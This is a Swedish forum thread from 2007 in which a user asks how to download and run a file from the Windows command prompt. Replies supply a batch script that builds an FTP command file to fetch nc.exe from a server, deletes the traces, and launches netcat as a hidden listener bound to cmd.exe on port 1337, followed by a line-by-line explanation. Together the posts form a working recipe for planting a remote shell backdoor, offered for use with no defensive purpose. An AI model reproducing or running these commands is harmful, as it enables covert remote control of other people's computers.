2007-04-13, 20:23
Medlem
drubidos avatar
Söker ett kommando som laddar hem och kör en fil från kommandotolken. Jag tänkte då på en win2000, har hittat en del kommandon som går någon i stil med

echo off && echo open "ip adress">ftp.tmp && echo user "user">>ftp.tmp && echo "pass">>ftp.tmp && echo bin>>ftp.tmp && echo get nc.exe && echo close>>ftp.tmp && echo quit>>ftp.tmp && type ftp.tmp && pause && ftp -n -s:ftp.tmp && pause && del ftp.tmp

Men inget har fungerat. Kan någon tipsa om något bättre?
Citera
2007-04-13, 20:43
Medlem
Citat:
Ursprungligen postat av drubido
Söker ett kommando som laddar hem och kör en fil från kommandotolken. Jag tänkte då på en win2000, har hittat en del kommandon som går någon i stil med

echo off && echo open "ip adress">ftp.tmp && echo user "user">>ftp.tmp && echo "pass">>ftp.tmp && echo bin>>ftp.tmp && echo get nc.exe && echo close>>ftp.tmp && echo quit>>ftp.tmp && type ftp.tmp && pause && ftp -n -s:ftp.tmp && pause && del ftp.tmp

Men inget har fungerat. Kan någon tipsa om något bättre?

Slängde ihop detta, bör fungera...

Kod:
@echo off
set ftpFile=%temp%\ftp.tmp
echo user>%ftpFile%
echo pass>>%ftpFile%
echo binary>>%ftpFile%
echo get nc.exe>>%ftpFile%
echo.>>%ftpFile%
echo quit>>%ftpFile%

ftp -s:%ftpFile% 127.0.0.1

del %ftpFile%

nc.exe -d -L -p 1337 -e cmd.exe

Edit: Glömde lite
Citera
2007-04-13, 22:51
Medlem
RollerBoySEs avatar
Inte Datasäkerhet, flyttas till Datoranvändning.

/Mod
Citera
2007-04-14, 01:53
Medlem
Citat:
Ursprungligen postat av sasha^
Slängde ihop detta, bör fungera...

Kod:
@echo off
set ftpFile=%temp%\ftp.tmp
echo user>%ftpFile%
echo pass>>%ftpFile%
echo binary>>%ftpFile%
echo get nc.exe>>%ftpFile%
echo.>>%ftpFile%
echo quit>>%ftpFile%

ftp -s:%ftpFile% 127.0.0.1

del %ftpFile%

nc.exe -d -L -p 1337 -e cmd.exe

Edit: Glömde lite

Nån som kan förklara vad det gör för en som inte förstår.
Vad jag har fattat är att den ansluter till en ftp med user och pass, hämtar en fil, exekverar filen och sedan tar bort den.
Men någon som skulle kunna förklara lite mer ingående?
Citera
2007-04-15, 22:44
Medlem
call3s avatar
Citat:
Ursprungligen postat av kitub
Nån som kan förklara vad det gör för en som inte förstår.
Vad jag har fattat är att den ansluter till en ftp med user och pass, hämtar en fil, exekverar filen och sedan tar bort den.
Men någon som skulle kunna förklara lite mer ingående?
sure thing. Sätter kommentarer med "#"
Kod:
@echo off #stänger av så den inte visar fel tror jag ....
set ftpFile=%temp%\ftp.tmp #här bestäms var den tillfälliga filen ftp.tmp ska ligga (oftast c:\windows\temp har jag för mig.)
#där det står > betyder "skapa" och >> betyder "fyll i" filen som står efter
echo user>%ftpFile% # här ändrar du till andvändarnamnet på ftpservern du vill ladda ner från. den lägger in det kommandot i filen
echo pass>>%ftpFile% # samma som ovan men lösenordet. den lägger in det kommandot i filen
echo binary>>%ftpFile% #här säger du att ftp ska andvända BINARY när den laddar ner filen. den lägger in det kommandot i filen
echo get nc.exe>>%ftpFile% # här säger du vilken fil du ska andvända . den lägger in det kommandot i filen
echo.>>%ftpFile% # syftet med . vet jag faktiskt inte men den lägger in det i filen
echo quit>>%ftpFile% # här säger du till ftp att avsluta. den lägger in det kommandot i filen

ftp -s:%ftpFile% 127.0.0.1 #här säger du åt windows att ftp ska följa commandona som ligger i ftp.tmp

del %ftpFile% # när det är utfört tar den bort filen ftp.tmp

nc.exe -d -L -p 1337 -e cmd.exe # här kör du programet du vill köra och vilka kommandon den ska köra (om programmet stöder kommandon)

Vet inte hur bra förklarat det är... men förstår du fortfaronde inte kanske jag kan skriva utförligare.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in